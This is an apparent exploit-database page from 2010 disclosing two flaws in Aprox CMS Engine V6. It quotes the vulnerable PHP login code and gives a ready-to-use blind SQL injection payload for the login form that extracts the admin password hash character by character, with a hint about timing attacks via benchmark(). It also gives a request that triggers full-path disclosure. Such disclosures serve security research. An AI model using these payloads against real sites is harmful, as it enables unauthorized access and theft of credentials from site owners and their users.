[webapps / 0day] - Aprox CMS Engine V6 Multiple Vulnerabilit
Posted on 03 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Aprox CMS Engine V6 Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Aprox CMS Engine V6 Multiple Vulnerabilities by Stephan Sattler in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================ Aprox CMS Engine V6 Multiple Vulnerabilities ============================================ # Exploit Title: Aprox CMS Engine V6 Multiple Vulnerabilities # Date: 03.10.2010 # Author: Stephan Sattler // http://www.solidmedia.de # Software Website: http://www.aprox.de/ # Software Link: http://www.aprox.de/index.php?page=d&application=zip&dateiname=AproxEngine_v6 # Version: 6 [ Vulnerability 1] # Vulnerable Code: sql_login.inc line 63-91 if (isset($_GET["action"]) && ($_GET["action"] != "")){$action = $_GET["action"];} unset($password); if (isset($_POST["password"]) && ($_POST["password"] != "")){$password = md5($_POST["password"]);} unset($login); if (isset($_POST["login"]) && ($_POST["login"] != "")){$login = $_POST["login"];} if (($login=="") or ($password=="")) {echo "Angegeben nicht vollständig!";die;} $db = mysql_connect(serverhost, user, pass, database); $abfrage = "select * from ". suffix ."users where login = '$login'"; $res = mysql_db_query(database, "$abfrage"); $num = mysql_num_rows($res); #echo $num; if ($num >0) { #echo "user gefunden,<br>"; $pass = mysql_result($res, 0, 'password'); if ($password == $pass) { echo "Alles OK!!!"; $name = mysql_result($res, 0, 'real_name'); $_SESSION["name"] = $name; $_SESSION["login"] = $login; $_SESSION["pass"] = $pass; $login_gepruefter_user = mysql_result($res, 0, 'gepr_mitglied'); $_SESSION["gepruefter_user"] = $login_gepruefter_user; # Explanation: $_POST["login"] isn't sanitized before executing the database query. An attacker can use this for a blind SQL injection attack. # Exploiting the Vulnerability // PoC: URL: http://[site]/[path]/index.php?page=sql_login Postdata(Example for the admin user which is created after install): login=admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100&password=passwort&Submit=Login ->if login succeeds, the first character of the hash is greater than d(ascii 100). An attacker can insert his/her own login credentials and test it with them or do it with benchmark() without a user-account. Aprox stores failed logins in a Session so this won't prevent an attack. [Vulnerability 2] # Path Disclosure For Example: http://[site]/[path]/index.php?id=1 AnD 1=1 will provoke an error so the full path will be presented to you. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-03]</pre></body></html>
